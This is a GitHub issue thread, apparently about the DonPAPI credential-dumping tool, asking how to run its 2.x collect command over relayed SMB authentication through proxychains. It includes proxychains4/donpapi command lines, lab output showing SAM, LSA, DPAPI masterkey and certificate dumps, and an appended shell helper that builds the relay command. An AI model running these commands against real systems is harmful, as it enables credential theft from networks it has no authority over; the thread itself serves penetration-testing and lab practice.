
Support for Proxied SMB Authentication Connections

Open mr-pmillz opened this issue 1 year ago • 2 comments

Prior to version 2.0, it was possible to proxy SMB relayed auth from ntlmrelayx.py to donpapi via the following syntax:

proxychains4 donpapi -o . -dc-ip <DCIP> -no-pass NETBIOSDOMAIN/USERNAME@10.10.10.10

^ This works properly as intended.

In the latest version since the 2.0 release, I haven't been able to figure out how to get this to work. I've tried syntax such as, but not limited to:

proxychains4 donpapi collect -d example.com --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect -d NETBIOSDOMAIN --dc-ip <DCIP> --no-pass -u USERNAME -t 10.10.10.10

Is there a way in the latest version of donpapi for the collect sub-command to support proxied authentication?

mr-pmillz avatar Aug 08 '24 20:08 mr-pmillz

Hey @mr-pmillz, I am practicing Game of Active Directory and was able to get it to run as proxychains donpapi collect -t 'TARGETIP' -u 'USERNAME' -d 'NETBIOSDOMAIN' --no-pass; however, even though the output shows the following:

[192.168.56.22] [+] Starting gathering credz
[192.168.56.22] [+] Dumping SAM
[192.168.56.22] [$] [SAM] Got 5 accounts
[192.168.56.22] [+] Dumping LSA
[192.168.56.22] [$] [LSA] (Unknown User):xxxXXXXxxxxXXXXX
[192.168.56.22] [+] Dumping User and Machine masterkeys
[192.168.56.22] [$] [DPAPI] Got 7 masterkeys
[192.168.56.22] [+] Dumping User Chromium Browsers
[192.168.56.22] [+] Dumping User and Machine Certificates
[192.168.56.22] [$] [Certificates] [SYSTEM] - VAGRANT - VAGRANT_3B1B828383EEA854.pfx
[192.168.56.22] [$] [Certificates] [SYSTEM] - SAN not found - SAN not found_B427A2FC1D1C57FC.pfx
[192.168.56.22] [+] Dumping User and Machine Credential Manager
[192.168.56.22] [+] Gathering recent files and desktop files
[192.168.56.22] [+] Dumping User Firefox Browser
[192.168.56.22] [+] Dumping MobaXterm credentials
[192.168.56.22] [+] Dumping MRemoteNg Passwords
[192.168.56.22] [+] Dumping User's RDCManager
[192.168.56.22] [+] Dumping SCCM Credentials

I see only one secret and 2 certs in the DonPAPI web GUI, and I should get more AFAIK.

vinsroman avatar Sep 18 '24 08:09 vinsroman

Ah interesting. Does it work with the DC IP and domain flags? Or does it only work when those flags are not specified when using proxied auth? @vinsroman

mr-pmillz avatar Oct 18 '24 17:10 mr-pmillz

Hey. Sorry for the delay. I have not been able to reproduce the issue:

[Image]

FYI, when you use DonPAPI through proxychains, it won't be able to dump a lot of secrets. This is because you won't use domain backup keys or even user credentials, so you will be able to collect only SYSTEM-related secrets (scheduled tasks, SCCM secrets, etc.).

Closing now, but feel free to reopen if I misunderstood / if needed!

zblurx avatar Feb 25 '25 16:02 zblurx
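The thread above boils down to a syntax change: the pre-2.0 target string DOMAIN/USER@HOST became the separate -t / -u / -d flags of the collect sub-command, and a session relayed by ntlmrelayx carries no password, so --no-pass is the only credential option that makes sense. The helper below is an added example written for this page, not code from the DonPAPI project: it converts the old-style target string into the 2.x invocation that vinsroman reported working through proxychains, rejects a string that smuggles a password in, and optionally appends --dc-ip. The flag names are those used in the thread; the sample target values are constructed.

```shell
#!/bin/sh
# Added example, not part of DonPAPI. Assumes the 2.x "collect" flags shown in
# the thread (-t target, -u user, -d domain, --no-pass, --dc-ip) and that the
# SOCKS session comes from ntlmrelayx, which never has the user's password.

# relay_collect_cmd 'DOMAIN/USER@HOST' [DCIP]
# Prints the proxychains4 + donpapi collect command line for a relayed session.
# Returns 1 (and prints a reason on stderr) when the target string is unusable.
relay_collect_cmd() {
    spec=$1
    dcip=$2

    # The old-style string must contain both a domain separator and a host part.
    case $spec in
        */*@*) ;;
        *) echo "expected DOMAIN/USER@HOST, got: $spec" >&2; return 1 ;;
    esac

    domain=${spec%%/*}   # everything before the first '/'
    rest=${spec#*/}      # USER[:PASS]@HOST
    user=${rest%@*}      # everything before the last '@'
    host=${rest##*@}     # everything after the last '@'

    # A relayed SMB session cannot take a password; a DOMAIN/USER:PASS@HOST
    # string means the caller is not actually in the relay scenario.
    case $user in
        *:*) echo "relayed sessions carry no password; drop ':...' from $spec" >&2; return 1 ;;
    esac

    if [ -z "$domain" ] || [ -z "$user" ] || [ -z "$host" ]; then
        echo "empty domain, user or host in: $spec" >&2
        return 1
    fi

    cmd="proxychains4 donpapi collect -t '$host' -u '$user' -d '$domain' --no-pass"
    if [ -n "$dcip" ]; then
        cmd="$cmd --dc-ip '$dcip'"
    fi
    printf '%s\n' "$cmd"
}

# Demonstration with constructed values (same placeholders as the thread).
relay_collect_cmd 'NETBIOSDOMAIN/USERNAME@10.10.10.10' '10.10.10.1'
```

Run the printed command only while the ntlmrelayx SOCKS session for that user and target is still alive and proxychains is pointed at it. As zblurx notes, expect SYSTEM-scoped secrets only: without the user's password or the domain DPAPI backup key, user masterkeys cannot be decrypted, so per-user browser, Credential Manager and similar blobs stay encrypted even though the dump lines print.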